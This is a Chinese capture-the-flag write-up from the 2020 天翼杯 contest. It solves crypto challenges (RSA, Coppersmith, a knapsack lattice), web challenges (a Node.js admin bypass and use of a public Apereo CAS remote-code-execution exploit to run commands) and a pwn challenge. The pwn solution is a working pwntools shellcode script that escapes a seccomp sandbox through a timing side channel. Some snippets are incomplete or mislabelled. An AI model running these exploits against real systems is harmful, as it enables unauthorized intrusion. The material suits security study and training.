天翼杯2020_wp_by_LQers
本文首发于“合天智汇”公众号 作者:Mr.zhang
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!
misc
签到
curl -H "Range: bytes=6291450000-" --output /dev/stdout
{51a295f02d6f591b49fb0fa9d9003c9b}
strange number
from z3 import * from pwn import * r = remote("183.129.189.60",10023) matrix = [] r.recvline() for i in range(20): line = r.recvline().strip().decode() line = line.split(' ') matrix.append([]) for _ in line: if(_ !=''): matrix[-1].append(int(_)) print(matrix) s= Solver() x = [] for i in range(0,20): x.append(Int('x%d'%i)) for i in range(20): result = 0 for j in range(20): result+=x[j]*matrix[i][j] s.add(result==matrix[i][-1]) print(s.check()) print(s.model()) result = [] for i in range(20): result.append(s.model()[x[i]].as_long()) print(bytes(result)) # flag:L1n3ar_funct10n
crypto
easyRSA
先找出e,再穷举flag。
n = 53868412634233045090369153437747412878975425992040754576346754596620347350784422917543759897936684646663150893442998869763798006729979997564587680875175995309635877031073898192380128134509976889005408768734374216063639902277690308505919178272615191163114645916867249827856751349851814346547505622471483949937 flag = [36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 30485289317489122513627424533258350515279207179552977911285197688270281245828407217991247923748564161409175076285380310289577344106125220128702373704159801265509969544840793736965464878414914537483701234228629064639374176394892003747894000649142798022157683437062596618574582761554787284372511226003550269371, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 25710430894158079311830714889718580974171581911002161989735153974074319352353008048142133029367435263698163394834768816086041815027231628825846495139208493868114079735178838159083476440613688096615701599646904740303121960899627887799112605887484922771885397056359474573599547493670021831421281871544848617729, 19732968894700182005170322933853544733918556507218610879172101330791135258760048103574784092873604313932829411687518781796870112528816456829131236447610238430534513141439255353077893832475969071823784414902688155677656081948848412872244494057776570244585895585353001527113887752049634607310624731379054225973, 49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 20410654833843880836232625906280502202859672782729125051826685074510132406319832186711328043576717168143926086499155426957562863035893608063763496001467692730847514246434999398419384281899893374238711551517649464555301605989912669722238859406226125066118408050493138139068479714147539973518962897827574079593, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 15747738389149130546683323352487624099130536202521411140249777871780143886920854454890229471824528461849537673346295452973409717079527784378744780352239762449801001678008011753760911978134166483356246071627173861470601418554748959055745539267882513648338847817602838808623857409763494613906204746380746041743, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 41816082923294550015345177100947705941041384208212791124911658070475546413503648718489777663979623501758652560264344194036417126974018212069759723298990493830911260380987927219778671357273815320923993066160279132764029408453741387628321086125359271717932477562073380143941135757967992556738856891243384983881, 2289661747463432904864726014469820089868859807681341604602724331315868027626911256942237265741150662379120096087503128257053991282511669446600149018298385954324456893093185337113453867043111379604256625373327695708031540726940582948952961996209717576768629087376812686254364929371492740503955614801880755029, 4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 17682515232429855272035901906772793825487721364344744362854466453245309632533244423538397321529685198664897252467080139806066355278301576555901412750048173484094398286014082522669828578258761701764108260931807262691138889541639002660481520728386113333127824444193307376521294377427870384102128500516960684947, 4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 33837532960782971009791077799738764896858649583072963199517227302081393621122306404955447605996320839470145314998033425661115068801570111325727613277035152575774982876149450313082012824128743218000149252557836744280911674724684003561337786214393597090329060449104920400289411467319248511722415235332423804311, 30030303315850134541983623762793648940576863243875408346383336740002014977915867166596483716837565090899781937786444667011603255898645014579568163387075249462739655058635864271192704361549774337456607506026964549661765427917083344151333423310742416015343716142879418000874164534510255100626106244640607206741] e = 0 for ee in range(2, 20000): if pow(ord('f'), ee, n ) == flag[0]: e = ee break ans = [] for f in flag: for ch in range(0x20, 0x7f): if pow(ch, e, n) == f: ans.append(chr(ch)) break print(''.join(ans))
hardRSA
题目脚本:
# chall.py # flag{6809781d08e120627e623dcdafe26b8a} p = getPrime(510) q = getPrime(510) r = getPrime(510) e = 7 m = bytes_to_long(os.urandom(30) + flag) n = p * q * r d = invert(e, (p - 1) * (q - 1) * (r - 1)) c = pow(m, e, n) print(n // p) print(p) print(c) print(hex(d % (1 << 540)))
从题目看也是Coppersmith partial d的情况,只是这里由于$n$由$p、q、r$三个素数组成,因此需要我们重新推导同余方程
已知:$kbits = 540$、$p$、$qr$、$d_0$的值,$d_0 = d \mod 2^{kbits}$
推导如下:
通过上式可以求得所有的$s \mod 2^{kbits}$的值,同时我们知道
联立公式$1 \times q$和公式$2 \times k(p-1)$,可以得到公式
$$ed_0q = q + kq(p-1)(qr-s+1) \tag{3}$$
$$k(p-1)qr = kq(p-1)(s-q) \tag{4}$$
相加得到:
$$ed_0q + k(p-1)qr = q+kq(p-1)(qr-q+1)$$
即:
$$ed_0q + k(p-1)qr-k(p-1)q(qr-q+1) = q \mod 2^{kbits}$$
解上述同余方程,即可得到$q \mod 2^{kbits}$
由于$kbits=540$,而$q$只有$510 bits$,所以解出来的就是可能的$q$的值,再通过$qr % q==0$过滤即可
def find_q(d0, kbits, e, qr, p): X = var('X') for k in range(1, e + 1): temp = k*(p-1) results = solve_mod([e*d0*X+temp*qr-temp*X*(qr-X+1)==X], 2 ^ kbits) for x in results: q = ZZ(x[0]) if qr % q == 0: return q return None if __name__ == '__main__': qr = 6857671284539062742975668483013695756136974308830302383869017675211748459038460434623218652374536550644287079851235538790745857383008797698872874798021995947967308637270510423795384863442755166813716746318469915880844736019524077541319597047087620854791342900521099848683663304636436936596021386279685708537 p = 2141698433991046082370939321691850154692026423424010392532982575546199921995522418737105878977898158159119041866620684371362271661642476751663585379591337 c = 4329606906986929520922207896899782825966852252045645553852666134465727605375552409314262439896695961792039946511877813768609658516837096110397826574615865145364406310497152725490038135469839136190625952342503082553246584871237205558902774064100332461452316195663446307120094941991930964324406679011451626126064494215289724959537793057773764253924636259378833228904446486925068109314698993641720938647836132806653451109926428309922461595730642461604303078237048 d0 = 0x8e6f66a517d9c8a610eb65dac5a613e72d47a29beaa5c77a9eb857e0db5d09eadf3a317776fdf27b0d85db0b6677afc8e0683d6dc2b4580281b6e99c3050f649213c37 e = 7 kbits = 540 q = find_q(d0, kbits, e, qr, p) print(q) # q = 2505948797318027758820680066583904581437202552654881626817593379353882
alicehomework
经典的背包问题,而且density也远远不足0.9408
from sage.all import * from Crypto.Util.number import long_to_bytes pk = ct = n = len(pk) # Sanity check for application of low density attack d = n / log(max(pk), 2) print(CDF(d)) assert CDF(d) < 0.9408 M = Matrix.identity(n) * 2 last_row = [1 for x in pk] M_last_row = Matrix(ZZ, 1, len(last_row), last_row) last_col = pk last_col.append(ct) M_last_col = Matrix(ZZ, len(last_col), 1, last_col) M = M.stack(M_last_row) M = M.augment(M_last_col) X = M.BKZ() sol = [] for i in range(n + 1): testrow = X.row(i).list()[:-1] print(testrow) if set(testrow).issubset([-1, 1]): for v in testrow: if v == 1: sol.append(0) elif v == -1: sol.append(1) break s = sol print(s) result = [pow(2,len(s)-1-i)*s[i] for i in range(len(s))] print(long_to_bytes(sum(result))) # flag{8130e8c14fe4df06558c0a7ebf06f272}
web
APITest
最近新学了nodejs,什么,我写的 API 有问题?【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】 http://183.129.189.60:54800
有个原题 https://xz.aliyun.com/t/7177#toc-6
第一步改成了 /becomeAdmin 来登录admin
POST /becomeAdmin {"value": 0.00000001}
其他步骤基本一致
-
随便登录一个用户
-
POST /becomeAdmin,利用javascript的sort特性得到admin权限
-
/updateUser,增加查看secret的权限
-
查看/serverInfo 拿到 secret
-
/init 传secret和上面拿到的一样,就拿到了admin的token了
-
用token访问/flag,拿到flag
apereocas
open /cas, getshell and flag in /flag【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】 http://183.129.189.60:55001 https://xpro-adl.91ctf.com/userdownload?filename=2007305f227ddc95f2e.war&type=attach&feature=custom
EXP直接打就可以了 https://github.com/langligelang/CAS_EXP
把源码里面的whoami改成其他命令,最后cat /flag
hardRSA
题目脚本:
DASCTF{7754cef7ac0cc97ff61262d3c888d482}
pwn
SafeBox
沙箱,open和read,没有write
line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013 0005: 0x15 0x06 0x00 0x00000002 if (A == open) goto 0012 0006: 0x15 0x00 0x06 0x00000000 if (A != read) goto 0013 0007: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count) 0008: 0x25 0x03 0x00 0x00000000 if (A > 0x0) goto 0012 0009: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0013 0010: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count) 0011: 0x35 0x00 0x01 0x00000004 if (A < 0x4) goto 0013 0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0013: 0x06 0x00 0x00 0x00000000 return KILL
vmmap在0x10000,可以直接放置"/home/pwn/flag"
open后read,使用cmp比较,等于则使用jz进行死循环,否则ret退出
构造payload不能有'\x00',可以用一些操作达到,这里我用右移
from pwn import * EXCV = context.binary = './chall' e = ELF(EXCV) if args.I: context.log_level = 'debug' def pwn(p, index, ch): # open shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;" # re open, rax => 4 shellcode += "push 2; pop rax; syscall;" # read(rax, 0x10040, 0x50) shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;" # cmp and jz if index == 0: shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch) else: shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch) shellcode = asm(shellcode) p.sendafter("safe-execution box?\n", shellcode.ljust(0x40-14, b'a') + b'/home/pwn/flag') index = 0 ans = [] while True: for ch in range(0x20, 127): if args.R: p = remote('183.129.189.61', 60402) else: p = process(EXCV) pwn(p, index, ch) start = time.time() try: p.recv(timeout=2) except: pass end = time.time() p.close() if end-start > 1.5: ans.append(ch) print("".join([chr(i) for i in ans])) break else: print("".join([chr(i) for i in ans])) break index = index + 1 print("".join([chr(i) for i in ans]))
DASCTF{0ee3530c57fb0b9c89e7af5d32b9f521}
re
mobile
发现有init 下断点,dump出init以后的方程组from scipy import linalg import numpy as np A = np.array([[13,144,129,36,58,38,53,40,103,125,97,19,68,132,31,148,150,96,118,37,30,143,134,37,96,42,129,84,111,66,13,48], [127,111,102,17,111,100,120,73,34,144,78,86,133,48,64,141,110,15,10,37,128,119,68,104,137,12,97,29,46,11,116,116], [131,124,54,57,55,122,74,123,57,44,63,131,81,86,56,92,31,118,98,135,66,115,51,128,102,67,41,40,41,144,53,84], [105,121,74,132,40,66,62,61,18,103,107,51,133,85,132,137,52,42,69,79,70,147,54,43,50,145,54,69,58,58,47,136], [74,42,58,65,62,134,53,56,143,74,70,84,33,112,36,61,41,17,93,111,66,85,62,37,133,149,144,41,103,55,16,125], [132,117,53,57,104,125,10,78,19,34,25,126,134,139,90,22,138,142,56,87,43,116,39,74,105,61,54,48,62,136,87,129], [68,132,28,102,69,71,36,72,59,114,96,55,71,75,126,76,89,106,116,33,138,143,144,15,65,86,61,79,64,24,62,10], [99,14,24,141,45,68,25,124,120,108,29,71,38,10,83,63,121,44,30,112,107,85,66,82,56,137,39,34,39,58,116,125], [45,62,120,103,55,148,56,81,89,99,51,113,80,79,102,41,27,46,62,33,74,70,100,56,37,129,102,112,137,13,48,145], [52,61,60,47,57,80,111,150,44,78,16,59,131,24,45,106,51,78,146,19,113,105,137,16,47,96,84,33,89,135,60,139], [60,123,121,10,28,65,43,111,144,118,11,26,37,84,103,12,14,57,126,54,27,116,78,103,128,73,135,107,102,63,98,78], [60,67,58,48,119,54,78,10,45,46,120,138,67,27,148,61,69,29,34,104,116,55,72,98,88,137,72,86,118,79,29,113], [67,62,119,70,136,125,47,145,27,80,75,69,40,145,37,37,97,41,114,90,99,87,144,130,66,10,42,43,144,130,71,110], [112,123,138,117,118,52,64,120,90,140,95,122,22,33,123,29,147,100,133,92,106,39,48,101,30,149,86,117,15,61,28,96], [76,36,111,139,53,16,93,74,132,24,123,49,91,24,87,40,32,74,130,73,13,135,88,46,105,53,40,49,48,63,15,34], [131,89,133,145,112,124,81,129,105,78,121,69,10,129,133,27,123,108,117,121,55,122,38,128,136,53,81,29,70,45,127,40], [134,133,51,63,124,110,47,117,75,34,148,29,112,90,87,83,123,25,20,148,81,38,95,129,117,72,48,33,104,38,21,143], [114,141,18,75,71,113,120,48,37,59,102,133,120,80,113,49,138,23,78,75,11,141,76,72,17,23,118,61,105,83,66,135], [113,83,105,92,102,24,58,126,46,23,34,83,89,62,102,69,16,102,103,147,46,28,101,42,20,17,27,11,132,133,119,68], [65,41,95,41,134,135,135,53,38,131,93,71,82,49,115,48,80,68,50,51,28,90,101,34,24,145,75,146,120,60,93,112], [24,82,139,150,113,128,36,130,47,32,93,53,122,39,96,19,131,33,42,123,80,113,108,24,73,117,131,81,29,66,20,149], [28,124,56,35,59,120,96,113,87,111,80,123,134,64,87,87,114,146,123,23,125,55,115,61,36,77,124,105,23,141,110,49], [112,85,116,86,54,150,85,86,108,86,45,36,87,122,51,54,75,44,104,103,35,128,143,73,69,13,47,38,68,12,122,50], [65,27,109,105,60,124,90,12,51,61,26,143,140,37,65,13,52,139,77,89,138,114,107,23,141,23,85,74,119,106,90,116], [20,64,138,52,23,97,52,38,135,65,26,134,135,14,143,32,110,52,50,80,133,66,69,90,78,20,147,28,115,27,93,48], [81,96,121,62,145,94,10,22,105,23,125,105,42,130,139,85,29,19,38,51,98,139,85,80,106,55,41,42,149,145,12,74], [18,132,72,121,138,97,104,74,40,81,33,103,113,85,32,29,146,88,27,137,36,126,32,56,37,29,82,89,79,100,87,72], [90,93,68,87,52,75,138,122,138,84,141,13,59,113,102,119,137,55,27,146,52,18,65,78,44,135,139,88,107,138,116,16], [44,100,139,101,13,76,68,17,56,74,72,27,102,28,70,108,46,39,34,46,142,17,141,60,52,103,136,70,20,102,147,98], [55,17,14,33,77,134,147,75,124,60,82,116,26,146,49,110,44,128,54,147,107,58,66,143,24,90,22,92,139,73,141,129], [134,84,27,62,46,34,58,144,43,136,107,11,82,95,24,117,57,113,73,44,91,141,44,60,128,142,96,57,127,60,74,54], [138,119,118,61,130,146,11,65,92,82,60,114,54,139,148,84,110,141,142,84,21,70,54,120,48,93,104,98,39,103,29,104]]) # A代表系数矩阵 y = np.array([0x384E9, 0x3AFD0, 0x398A1, 0x3B564, 0x34B76, 0x3C62C, 0x37432, 0x32D5D,0x38F35, 0x353F9, 0x357BC, 0x36AD4, 0x3B78A, 0x41D2D, 0x2F302, 0x43F88,0x3D180, 0x3C9E2, 0x330D3, 0x3DBB3, 0x3D102, 0x3FA50, 0x3859F, 0x396B7,0x336FD, 0x35B83, 0x39701, 0x402F4, 0x36160, 0x3C29B, 0x373F5, 0x43A68]) x = linalg.solve(A, y) print(x)
flag = [102, 108, 97, 103, 123, 119, 101, 49, 49, 95, 121, 48, 117, 95, 102, 48, 117, 110, 100, 95, 49, 55, 95, 99, 48, 110, 103, 114, 52, 55, 122, 125] flag = "" for i in range(len(flag)): flag += chr(flag1[i]) print(flag)
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐